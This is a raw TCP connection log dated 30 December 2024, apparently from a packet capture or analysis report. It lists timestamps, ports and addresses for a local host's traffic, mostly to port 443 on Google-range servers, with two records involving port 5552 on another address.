                                                                                                                                                                                    Dec 30, 2024 11:52:16.662920952 CET52220443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:16.663152933 CET52221443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:16.663156986 CET44352221142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:16.663264990 CET52220443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:16.663395882 CET44352221142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:16.663445950 CET52221443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:16.663750887 CET52221443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:16.687338114 CET44352219142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:16.695332050 CET44352222142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:16.703340054 CET44352220142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:16.711329937 CET44352221142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.018429041 CET44352219142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.018652916 CET52219443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.018667936 CET44352219142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.018857956 CET52219443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.018858910 CET52219443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.018901110 CET44352219142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.018953085 CET52219443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.019063950 CET44352219142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.019238949 CET52219443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.019812107 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.019854069 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.024252892 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.030363083 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.030374050 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.036221981 CET44352221142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.036722898 CET52221443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.036748886 CET44352221142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.036878109 CET52221443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.036962986 CET52221443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.036998034 CET44352221142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.037064075 CET52221443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.037441969 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.037481070 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.040159941 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.041990042 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.042005062 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067121029 CET44352222142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067177057 CET44352222142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067209005 CET52222443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067234039 CET44352222142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067260981 CET52222443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067291021 CET52222443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067296028 CET44352222142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067306042 CET44352222142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.067493916 CET52222443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.068101883 CET52222443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.068118095 CET44352222142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.068558931 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.068588972 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.068669081 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.069055080 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.069063902 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.222012043 CET44352220142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.222080946 CET44352220142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.222157955 CET52220443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.222189903 CET44352220142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.222312927 CET52220443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.222877979 CET52220443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.222923994 CET44352220142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.223109007 CET44352220142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.223139048 CET52220443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.223417997 CET52220443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.223537922 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.223592997 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.224040985 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.225687981 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.225703001 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.637193918 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.637309074 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.637978077 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.638077974 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.639692068 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.639704943 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.639954090 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.640062094 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.640335083 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.656111002 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.656232119 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.656857014 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.656999111 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.659707069 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.659719944 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.659955978 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.660142899 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.664088011 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:17.665899038 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.666030884 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.667788029 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.667794943 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.668019056 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.668268919 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.668550014 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.687333107 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.711328983 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.711335897 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.866497040 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.866581917 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.868614912 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.868638039 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.868997097 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.869056940 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.869590998 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:17.915330887 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.008753061 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.008814096 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.008826971 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.008852005 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.023370981 CET52229443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.023390055 CET44352229142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.024328947 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.024378061 CET44352239142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.024435997 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.024683952 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.024701118 CET44352239142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.041749001 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.041824102 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.041949987 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.041986942 CET44352228142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.042048931 CET52228443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.042424917 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.042444944 CET44352242142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.042536974 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.042723894 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.042730093 CET44352242142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.082561970 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.082608938 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.082633972 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.082657099 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.082673073 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.082695961 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.083466053 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.083499908 CET44352230142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.083575010 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.083581924 CET52230443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.084165096 CET52244443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.084208012 CET44352244142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.084270954 CET52244443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.084480047 CET52244443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.084501982 CET44352244142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267622948 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267693996 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267712116 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267730951 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267740011 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267807961 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267832994 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.267867088 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.268673897 CET52232443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.268683910 CET44352232142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.269313097 CET52246443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.269365072 CET44352246142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.269483089 CET52246443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.269717932 CET52246443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.269737005 CET44352246142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.651302099 CET44352242142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.651361942 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.652086020 CET44352242142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.652148962 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.674273968 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.674298048 CET44352242142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.674660921 CET44352242142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.674719095 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.681772947 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.688930988 CET44352244142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.689017057 CET52244443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.689361095 CET52244443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.689373970 CET44352244142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.691464901 CET52244443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.691472054 CET44352244142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.711343050 CET44352239142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.711508989 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.714426041 CET44352239142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.714509010 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.719820023 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.719857931 CET44352239142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.720351934 CET44352239142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.720732927 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.720973015 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:18.723336935 CET44352242142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.767329931 CET44352239142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.869272947 CET44352246142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.869368076 CET52246443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.870846987 CET52246443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.870857000 CET44352246142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:18.872555971 CET52246443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:18.872562885 CET44352246142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.039763927 CET52242443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.039969921 CET52244443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:19.040000916 CET52239443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.040011883 CET52246443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:19.043391943 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.043395996 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.043436050 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.043447018 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.043504953 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.043509960 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.044470072 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.044487953 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.044576883 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.044594049 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.273184061 CET555249753172.111.138.100192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.320739031 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                                    Dec 30, 2024 11:52:19.646704912 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.646929026 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.647206068 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.647219896 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.647454977 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.647460938 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.653469086 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.653667927 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.653915882 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.653923988 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:19.654411077 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:19.654414892 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.031900883 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032036066 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032075882 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032212973 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032311916 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032352924 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032368898 CET44352254142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032391071 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.032430887 CET52254443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033186913 CET52262443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033225060 CET44352262142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033288956 CET52262443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033418894 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033479929 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033545017 CET52262443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033557892 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033561945 CET44352262142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033862114 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.033874989 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.061029911 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.061084032 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.061110020 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.061232090 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.065262079 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.065321922 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.065352917 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.065373898 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.068660975 CET52255443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.068675041 CET44352255142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069272995 CET52264443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069298983 CET44352264142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069462061 CET52265443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069493055 CET52264443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069528103 CET44352265142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069664001 CET52264443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069673061 CET44352264142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.069714069 CET52265443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.076878071 CET52265443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.076901913 CET44352265142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.644371986 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.644475937 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.644855976 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.644864082 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.646605968 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.646611929 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.647075891 CET44352262142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.647192001 CET52262443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.647468090 CET52262443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.647480965 CET44352262142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.649085999 CET52262443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.649092913 CET44352262142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.679038048 CET44352265142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.679096937 CET52265443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.679446936 CET52265443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.679455042 CET44352265142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.679615021 CET52265443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:20.679621935 CET44352265142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.689359903 CET44352264142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.689627886 CET52264443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.689853907 CET52264443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.689853907 CET52264443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:20.689860106 CET44352264142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:20.689871073 CET44352264142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:21.017005920 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:21.017286062 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:21.018135071 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:21.018174887 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:21.018194914 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:21.018313885 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:21.019032955 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:21.019041061 CET44352263142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:21.019051075 CET52263443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:21.019186020 CET52263443192.168.2.4142.250.181.238
